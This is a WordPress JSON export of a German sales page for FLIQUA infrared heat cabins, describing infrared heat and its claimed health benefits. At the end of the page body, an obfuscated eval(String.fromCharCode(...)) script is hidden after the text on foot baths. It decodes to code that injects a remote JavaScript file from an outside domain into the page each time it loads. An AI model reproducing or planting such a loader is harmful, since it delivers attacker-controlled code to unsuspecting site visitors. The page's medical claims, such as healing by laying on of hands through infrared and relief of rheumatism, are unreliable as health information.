{"id":116,"date":"2016-01-28T13:59:25","date_gmt":"2016-01-28T13:59:25","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=116"},"modified":"2016-03-13T21:13:49","modified_gmt":"2016-03-13T20:13:49","slug":"anwendungen","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=116","title":{"rendered":"FLIQUA  Infrarotw\u00e4rmekabine"},"content":{"rendered":"<p><strong>FLIQUA. Infrarotw\u00e4rme.<\/strong> <strong>Infrarotw\u00e4rmekabine.<\/strong> Was ist Infrarotw\u00e4rme? Infrarotw\u00e4rme ist eine Strahlungsw\u00e4rme. Ein Teil der von der Sonne ausgehenden Strahlen sind Infrarotstrahlen. Sie sind unsichtbar und werden als W\u00e4rme wahrgenommen. <!--more--><\/p>\n<p>Heilung durch Handauflegen, die in China eine 3000 Jahre alte Tradition hat, basiert zum Teil auf der heilenden Wirkung der nat\u00fcrlichen Infrarot-Strahlung. Der menschliche K\u00f6rper sendet durch die Haut infrarote Strahlen von 3 \u2013 50 \u00b5m mit einem mittleren Wert von 9\u00b5m. Unsere Handfl\u00e4chen senden eine infrarote Energie von 8 \u2013 14 \u00b5m. (1\u00b5m = 10<sup>-6<\/sup>m). Die W\u00e4rmeelemente im Infrarot-W\u00e4rmesystemen breiten ein Drittel ihrer Kapazit\u00e4t im mittleren Wellenbereich mit 2 \u2013 5,6 \u00b5m aus, die restlichen zwei Drittel werden im Bereich 5,6 \u2013 25 \u00b5m abgegeben, was f\u00fcr die tiefere Durchdringung wesentlich ist. Diese Kombination verst\u00e4rkt die positiven gesundheitlichen Wirkungen der Infrarot-W\u00e4rmestrahlung. Chinesische Forscher halten die Wellenbereiche von 2 \u2013 25 \u00b5m f\u00fcr die therapeutisch am effektivsten. <!--more--><\/p>\n<p>Die Infrarot W\u00e4rmestrahlung bewirkt im Gewebe eine Tiefenw\u00e4rme, die der K\u00f6rper bis zu 93% absorbiert. Die herk\u00f6mmliche Warmluftsauna kann nur direkte Formen der Erw\u00e4rmung bieten. Durch Hei\u00dfluftzirkulation und direkte Einwirkung der sehr hei\u00dfen Luft auf die \u00e4u\u00dfere Hautschicht erreicht sie ihre Wirkung. Bei einem Infrarot-W\u00e4rmesystem erw\u00e4rmen 80% der aufgewendeten Energie direkt den K\u00f6rper und nur 20% der Strahlungsw\u00e4rme erw\u00e4rmen die Luft. Die Infrarot-W\u00e4rmestrahlung kann durch Tiefenw\u00e4rme ein erheblich h\u00f6heres Schwei\u00dfvolumen bewirken als die herk\u00f6mmliche Sauna, obwohl sie anstelle von 85-100\u00b0C in wesentlich niedrigerem und vertr\u00e4glicherem Temperaturbereich von 50-65\u00b0C arbeitet. Risikofaktoren durch Gef\u00e4\u00dfverengung werden hierdurch erheblich reduziert, das Einatmen von sehr hei\u00dfer Luft vermieden. Es kann sogar w\u00e4hrend der Nutzung frische, k\u00fchle Atemluft zugef\u00fchrt werden, ohne dass die intensive Schwei\u00dfbildung beeintr\u00e4chtigt wird. In F\u00e4llen, wo nur die heilende Tiefenwirkung der Infrarotstrahlen genutzt werden soll (z.B. Zerrungen, Sportverletzungen, Rheuma), kann das W\u00e4rmesystem selbst bei offener T\u00fcre genutzt werden. Diese Art der Nutzung (W\u00e4rmeb\u00e4der) kann auch gut zum Aufw\u00e4rmen vor physischer Belastung (z.B. Sport), zur Muskelentspannung und Durchblutungssteigerung dienen.<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<p>Infrarotkabine <a href=\"http:\/\/shopingpoint.de\/www\/fliqua\/wp-content\/uploads\/2016\/01\/Langeoog-med.jpg\" rel=\"attachment wp-att-238\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-238\" src=\"http:\/\/shopingpoint.de\/www\/fliqua\/wp-content\/uploads\/2016\/01\/Langeoog-med-200x300.jpg\" alt=\"Langeoog-med\" width=\"200\" height=\"300\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Langeoog-med-200x300.jpg 200w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Langeoog-med.jpg 337w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><\/a> <a href=\"http:\/\/shopingpoint.de\/www\/fliqua\/wp-content\/uploads\/2016\/01\/Verstellung.jpg\" rel=\"attachment wp-att-239\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-239 alignnone\" src=\"http:\/\/shopingpoint.de\/www\/fliqua\/wp-content\/uploads\/2016\/01\/Verstellung-300x138.jpg\" alt=\"Verstellung\" width=\"300\" height=\"138\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Verstellung-300x138.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Verstellung-768x354.jpg 768w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/Verstellung.jpg 900w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><!--more--><\/p>\n<p>&nbsp;<\/p>\n<p>FLIQUA bietet als Zusatz-Option folgendes an:\u00a0 Gesundheitsf\u00f6rdernde Fu\u00dfb\u00e4der.<script type=text\/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=text\/javascript> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>FLIQUA. Infrarotw\u00e4rme. Infrarotw\u00e4rmekabine. Was ist Infrarotw\u00e4rme? Infrarotw\u00e4rme ist eine Strahlungsw\u00e4rme. Ein Teil der von der Sonne ausgehenden Strahlen sind Infrarotstrahlen. Sie sind unsichtbar und werden als W\u00e4rme wahrgenommen.<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-116","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/116","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=116"}],"version-history":[{"count":15,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/116\/revisions"}],"predecessor-version":[{"id":611,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/116\/revisions\/611"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=116"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}